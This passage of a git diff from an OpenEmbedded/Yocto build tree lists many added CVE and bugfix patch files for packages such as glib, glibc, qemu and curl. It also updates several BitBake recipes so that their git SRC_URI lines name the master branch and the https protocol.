poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch create mode 100644 poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch create mode 100644 poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch create mode 100644 poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch create mode 100644 poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch create mode 100644 poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch create mode 100644 poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch create mode 100644 poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch create mode 100644 poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch create mode 100644 poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch create mode 100644 poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch create mode 100644 poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch create mode 100644 poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch create mode 100644 poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch delete mode 100644 poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch delete mode 100644 poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch delete mode 100644 poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch delete mode 100644 poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch delete mode 100644 poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb create mode 100644 poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb create mode 100644 poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch create mode 100644 poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch create mode 100644 poky/meta/recipes-devtools/git/git/fixsort.patch create mode 100644 poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch create mode 100644 poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch create mode 100644 poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch create mode 100644 poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch create mode 100644 poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch create mode 100644 poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch create mode 100644 poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch delete mode 100644 poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch create mode 100755 poky/meta/recipes-devtools/pseudo/files/build-oldlibc create mode 100644 poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch create mode 100644 poky/meta/recipes-devtools/python/python3/makerace.patch delete mode 100644 poky/meta/recipes-devtools/python/python3_3.8.11.bb create mode 100644 poky/meta/recipes-devtools/python/python3_3.8.12.bb create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch create mode 100644 poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch create mode 100644 poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch create mode 100644 poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch create mode 100644 poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch create mode 100644 poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch create mode 100644 poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch create mode 100644 poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch create mode 100644 poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch create mode 100644 poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch create mode 100644 poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch create mode 100644 poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch create mode 100644 poky/meta/recipes-graphics/glew/glew/notempdir.patch create mode 100644 poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch create mode 100644 poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch create mode 100644 poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch create mode 100644 poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch create mode 100644 poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch create mode 100644 poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch create mode 100644 poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch create mode 100644 poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch create mode 100644 poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch create mode 100644 poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch create mode 100644 poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch create mode 100644 poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate create mode 100644 poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema create mode 100644 poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate create mode 100644 poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb delete mode 100644 poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb create mode 100644 poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb delete mode 100644 poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb create mode 100644 poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb create mode 100644 poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch create mode 100644 poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch create mode 100644 poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch create mode 100644 poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch create mode 100644 poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch create mode 100644 poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch create mode 100644 poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch create mode 100644 poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch create mode 100644 poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch create mode 100644 poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch delete mode 100644 poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch delete mode 100644 poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch delete mode 100644 poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb create mode 100644 poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb create mode 100644 poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch create mode 100644 poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch create mode 100644 poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch create mode 100644 poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch delete mode 100644 poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb create mode 100644 poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb create mode 100644 poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch create mode 100644 poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch create mode 100644 poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch create mode 100644 poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch create mode 100644 poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch create mode 100644 poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch create mode 100644 poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch create mode 100644 poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch create mode 100644 poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch create mode 100644 poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch create mode 100644 poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch create mode 100644 poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch create mode 100644 poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch create mode 100644 poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch create mode 100644 poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch create mode 100644 poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch create mode 100644 poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch create mode 100644 poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch create mode 100644 poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch create mode 100644 poky/meta/recipes-support/vim/files/CVE-2021-3778.patch create mode 100644 poky/meta/recipes-support/vim/files/CVE-2021-4069.patch create mode 100644 poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch create mode 100755 poky/scripts/contrib/convert-srcuri.py diff --git a/meta-openembedded/meta-filesystems/recipes-filesystems/logfsprogs/logfsprogs_git.bb b/meta-openembedded/meta-filesystems/recipes-filesystems/logfsprogs/logfsprogs_git.bb index d9864ac3e8..e4a0f95692 100644 --- a/meta-openembedded/meta-filesystems/recipes-filesystems/logfsprogs/logfsprogs_git.bb +++ b/meta-openembedded/meta-filesystems/recipes-filesystems/logfsprogs/logfsprogs_git.bb @@ -11,7 +11,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://fsck.c;md5=3859dc73da97909ff1d0125e88a27e02" DEPENDS = "zlib" -SRC_URI = "git://github.com/prasad-joshi/logfsprogs.git \ +SRC_URI = "git://github.com/prasad-joshi/logfsprogs.git;branch=master;protocol=https \ file://0001-Add-LDFLAGS-to-linker-cmdline.patch \ file://0001-btree-Avoid-conflicts-with-libc-namespace-about-setk.patch \ file://0001-include-sys-sysmacros.h-for-major-minor-definition.patch \ diff --git a/meta-openembedded/meta-filesystems/recipes-filesystems/owfs/owfs_3.2p3.bb b/meta-openembedded/meta-filesystems/recipes-filesystems/owfs/owfs_3.2p3.bb index 414084449f..9e546e8a39 100644 --- a/meta-openembedded/meta-filesystems/recipes-filesystems/owfs/owfs_3.2p3.bb +++ b/meta-openembedded/meta-filesystems/recipes-filesystems/owfs/owfs_3.2p3.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=628b867016631792781a8735a04760e5 \ DEPENDS = "fuse virtual/libusb0" # v3.2p3 SRCREV = "3744375dfaa350e31c9b360eb1e1a517bbeb5c47" -SRC_URI = "git://github.com/owfs/owfs \ +SRC_URI = "git://github.com/owfs/owfs;branch=master;protocol=https \ file://0001-Add-build-rule-for-README.patch \ file://owhttpd \ file://owserver \ diff --git a/meta-openembedded/meta-filesystems/recipes-filesystems/sshfs-fuse/sshfs-fuse_3.7.0.bb b/meta-openembedded/meta-filesystems/recipes-filesystems/sshfs-fuse/sshfs-fuse_3.7.0.bb index bf9c34dc97..9b776e9dc7 100644 --- a/meta-openembedded/meta-filesystems/recipes-filesystems/sshfs-fuse/sshfs-fuse_3.7.0.bb +++ b/meta-openembedded/meta-filesystems/recipes-filesystems/sshfs-fuse/sshfs-fuse_3.7.0.bb @@ -6,7 +6,7 @@ LICENSE = "GPLv2" DEPENDS = "glib-2.0 fuse3" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/libfuse/sshfs" +SRC_URI = "git://github.com/libfuse/sshfs;branch=master;protocol=https" SRCREV = "a7e1038203c856cc7e052d439d1da49fe131339f" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-filesystems/recipes-filesystems/unionfs-fuse/unionfs-fuse_2.1.bb b/meta-openembedded/meta-filesystems/recipes-filesystems/unionfs-fuse/unionfs-fuse_2.1.bb index 3dd5c82ee5..13273f7bc8 100644 --- a/meta-openembedded/meta-filesystems/recipes-filesystems/unionfs-fuse/unionfs-fuse_2.1.bb +++ b/meta-openembedded/meta-filesystems/recipes-filesystems/unionfs-fuse/unionfs-fuse_2.1.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://src/unionfs.c;beginline=3;endline=8;md5=30fa8de70fd8a file://LICENSE;md5=7e5a37fce17307066eec6b23546da3b3 \ " -SRC_URI = "git://github.com/rpodgorny/${BPN}.git;branch=master \ +SRC_URI = "git://github.com/rpodgorny/${BPN}.git;branch=master;protocol=https \ file://0001-support-cross-compiling.patch \ " SRCREV = "8d732962423c3ca5be1f14b7ec139ff464e10a51" diff --git a/meta-openembedded/meta-filesystems/recipes-utils/f2fs-tools/f2fs-tools_1.13.0.bb b/meta-openembedded/meta-filesystems/recipes-utils/f2fs-tools/f2fs-tools_1.13.0.bb index 98bd478f32..2c5a9e16b3 100644 --- a/meta-openembedded/meta-filesystems/recipes-utils/f2fs-tools/f2fs-tools_1.13.0.bb +++ b/meta-openembedded/meta-filesystems/recipes-utils/f2fs-tools/f2fs-tools_1.13.0.bb @@ -9,7 +9,7 @@ DEPENDS = "util-linux" # v1.13.0 SRCREV = "284f77f0075a16a2ad1f3b0fb89b7f64a1bc755d" -SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/jaegeuk/f2fs-tools.git \ +SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/jaegeuk/f2fs-tools.git;branch=master \ file://0001-f2fs-tools-Use-srcdir-prefix-to-denote-include-path.patch \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-filesystems/recipes-utils/fatcat/fatcat_1.1.0.bb b/meta-openembedded/meta-filesystems/recipes-utils/fatcat/fatcat_1.1.0.bb index c72671739d..c90a7ecc2b 100644 --- a/meta-openembedded/meta-filesystems/recipes-utils/fatcat/fatcat_1.1.0.bb +++ b/meta-openembedded/meta-filesystems/recipes-utils/fatcat/fatcat_1.1.0.bb @@ -7,7 +7,7 @@ HOMEPAGE = "https://github.com/Gregwar/fatcat" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=57fbbfebd0dd1d6ff21b8cecb552a03f" -SRC_URI = "git://github.com/Gregwar/fatcat.git \ +SRC_URI = "git://github.com/Gregwar/fatcat.git;branch=master;protocol=https \ file://0001-Use-unistd.h-not-argp.h-for-all-POSIX-systems.patch \ " diff --git a/meta-openembedded/meta-filesystems/recipes-utils/fatresize/fatresize_1.0.2.bb b/meta-openembedded/meta-filesystems/recipes-utils/fatresize/fatresize_1.0.2.bb index 88d495b685..c258a128ee 100644 --- a/meta-openembedded/meta-filesystems/recipes-utils/fatresize/fatresize_1.0.2.bb +++ b/meta-openembedded/meta-filesystems/recipes-utils/fatresize/fatresize_1.0.2.bb @@ -3,7 +3,7 @@ SECTION = "console/tools" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" -SRC_URI = "git://salsa.debian.org/parted-team/fatresize.git;protocol=https" +SRC_URI = "git://salsa.debian.org/parted-team/fatresize.git;protocol=https;branch=master" SRCREV = "3f80afc76ad82d4a1b852a6c8dea24cd9f5e7a24" PV = "1.0.2-11" diff --git a/meta-openembedded/meta-filesystems/recipes-utils/ufs-utils/ufs-utils_git.bb b/meta-openembedded/meta-filesystems/recipes-utils/ufs-utils/ufs-utils_git.bb index 23583650b8..ed003ee7be 100644 --- a/meta-openembedded/meta-filesystems/recipes-utils/ufs-utils/ufs-utils_git.bb +++ b/meta-openembedded/meta-filesystems/recipes-utils/ufs-utils/ufs-utils_git.bb @@ -8,7 +8,7 @@ BRANCH ?= "dev" SRCREV = "a3cf93b66f4606a46354cf884d24aa966661f848" -SRC_URI = "git://github.com/westerndigitalcorporation/ufs-utils.git;protocol=git;branch=${BRANCH} \ +SRC_URI = "git://github.com/westerndigitalcorporation/ufs-utils.git;protocol=https;branch=${BRANCH} \ file://0001-Replace-u_intXX_t-with-kernel-typedefs.patch \ " diff --git a/meta-openembedded/meta-gnome/recipes-gnome/libchamplain/libchamplain_0.12.20.bb b/meta-openembedded/meta-gnome/recipes-gnome/libchamplain/libchamplain_0.12.20.bb index 90e5533015..7564275668 100644 --- a/meta-openembedded/meta-gnome/recipes-gnome/libchamplain/libchamplain_0.12.20.bb +++ b/meta-openembedded/meta-gnome/recipes-gnome/libchamplain/libchamplain_0.12.20.bb @@ -6,7 +6,7 @@ DEPENDS = "glib-2.0 gtk+3 gdk-pixbuf clutter-1.0 clutter-gtk-1.0 libsoup-2.4" inherit meson gobject-introspection SRCREV = "145e417f32e507b63c21ad4e915b808a6174099e" -SRC_URI = "git://github.com/gnome/libchamplain.git" +SRC_URI = "git://github.com/gnome/libchamplain.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-gnome/recipes-support/ibus/ibus.inc b/meta-openembedded/meta-gnome/recipes-support/ibus/ibus.inc index 1bbeb2c481..c0c0b3b31f 100644 --- a/meta-openembedded/meta-gnome/recipes-support/ibus/ibus.inc +++ b/meta-openembedded/meta-gnome/recipes-support/ibus/ibus.inc @@ -10,7 +10,7 @@ PV = "1.5.22" DEPENDS = "unicode-ucd" SRC_URI = " \ - git://github.com/ibus/ibus.git \ + git://github.com/ibus/ibus.git;branch=master;protocol=https \ file://0001-Do-not-try-to-start-dbus-we-do-not-have-dbus-lauch.patch \ " SRCREV = "e3262f08b9e3efc57808700823b0622ec03a1b5f" diff --git a/meta-openembedded/meta-gnome/recipes-support/keybinder/keybinder_3.0.bb b/meta-openembedded/meta-gnome/recipes-support/keybinder/keybinder_3.0.bb index d567d00d3f..fb4c816729 100644 --- a/meta-openembedded/meta-gnome/recipes-support/keybinder/keybinder_3.0.bb +++ b/meta-openembedded/meta-gnome/recipes-support/keybinder/keybinder_3.0.bb @@ -13,7 +13,7 @@ B = "${S}" SRCREV = "736ccef40d39603b8111c8a3a0bca0319bbafdc0" PV = "3.0+git${SRCPV}" -SRC_URI = "git://github.com/engla/keybinder.git;branch=keybinder-3.0 \ +SRC_URI = "git://github.com/engla/keybinder.git;branch=keybinder-3.0;protocol=https \ " RDEPENDS_${PN} = "gtk+" diff --git a/meta-openembedded/meta-gnome/recipes-support/libhandy/libhandy_git.bb b/meta-openembedded/meta-gnome/recipes-support/libhandy/libhandy_git.bb index 8c6159f998..6d63ddb86a 100644 --- a/meta-openembedded/meta-gnome/recipes-support/libhandy/libhandy_git.bb +++ b/meta-openembedded/meta-gnome/recipes-support/libhandy/libhandy_git.bb @@ -2,7 +2,7 @@ SUMMARY = "A library full of GTK+ widgets for mobile phones" LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" -SRC_URI = "git://source.puri.sm/Librem5/${BPN}.git;protocol=https" +SRC_URI = "git://source.puri.sm/Librem5/${BPN}.git;protocol=https;branch=master" SRCREV = "ef7c4bf75ae239495141ada83d2fbaf034315563" S = "${WORKDIR}/git" PV = "0.0.12" diff --git a/meta-openembedded/meta-gnome/recipes-support/libstemmer/libstemmer_git.bb b/meta-openembedded/meta-gnome/recipes-support/libstemmer/libstemmer_git.bb index 96dd880b6a..837807ccf9 100644 --- a/meta-openembedded/meta-gnome/recipes-support/libstemmer/libstemmer_git.bb +++ b/meta-openembedded/meta-gnome/recipes-support/libstemmer/libstemmer_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=2750797da77c1d784e7626b3f7d7ff3e" DEPENDS_class-target = "${BPN}-native" SRC_URI = "\ - git://github.com/snowballstem/snowball.git \ + git://github.com/snowballstem/snowball.git;branch=master;protocol=https \ file://0001-Build-so-lib.patch \ file://0002-snowball-stemwords-do-link-with-LDFLAGS-set-by-build.patch \ " diff --git a/meta-openembedded/meta-gnome/recipes-support/libwacom/libwacom_0.33.bb b/meta-openembedded/meta-gnome/recipes-support/libwacom/libwacom_0.33.bb index 6fb3b82ef1..5db78b7cf7 100644 --- a/meta-openembedded/meta-gnome/recipes-support/libwacom/libwacom_0.33.bb +++ b/meta-openembedded/meta-gnome/recipes-support/libwacom/libwacom_0.33.bb @@ -9,6 +9,6 @@ DEPENDS = " \ inherit autotools pkgconfig -SRC_URI = "git://github.com/linuxwacom/libwacom.git" +SRC_URI = "git://github.com/linuxwacom/libwacom.git;branch=master;protocol=https" SRCREV = "87cc710e21a6220e267dd08936bbec2932aa3658" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-initramfs/recipes-bsp/kexecboot/kexecboot_git.bb b/meta-openembedded/meta-initramfs/recipes-bsp/kexecboot/kexecboot_git.bb index ed3dece3f6..ee05045320 100644 --- a/meta-openembedded/meta-initramfs/recipes-bsp/kexecboot/kexecboot_git.bb +++ b/meta-openembedded/meta-initramfs/recipes-bsp/kexecboot/kexecboot_git.bb @@ -5,7 +5,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" PV = "0.6+git${SRCPV}" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/kexecboot/kexecboot.git" +SRC_URI = "git://github.com/kexecboot/kexecboot.git;branch=master;protocol=https" SRC_URI_append_libc-klibc = " file://0001-kexecboot-Use-new-reboot-API-with-klibc.patch " SRCREV = "5a5e04be206140059f42ac786d424da1afaa04b6" diff --git a/meta-openembedded/meta-initramfs/recipes-devtools/dracut/dracut_git.bb b/meta-openembedded/meta-initramfs/recipes-devtools/dracut/dracut_git.bb index 13cf5f6ded..dd22b196fa 100644 --- a/meta-openembedded/meta-initramfs/recipes-devtools/dracut/dracut_git.bb +++ b/meta-openembedded/meta-initramfs/recipes-devtools/dracut/dracut_git.bb @@ -10,7 +10,7 @@ PV = "049" # v048 tag SRCREV = "225e4b94cbdb702cf512490dcd2ad9ca5f5b22c1" -SRC_URI = "git://git.kernel.org/pub/scm/boot/dracut/dracut.git;protocol=http \ +SRC_URI = "git://git.kernel.org/pub/scm/boot/dracut/dracut.git;protocol=http;branch=master \ file://0001-util.h-include-sys-reg.h-when-libc-glibc.patch \ file://0001-dracut.sh-improve-udevdir.patch \ file://0001-set-viriable-_drv-not-local.patch \ diff --git a/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_8.40.bb b/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_8.40.bb 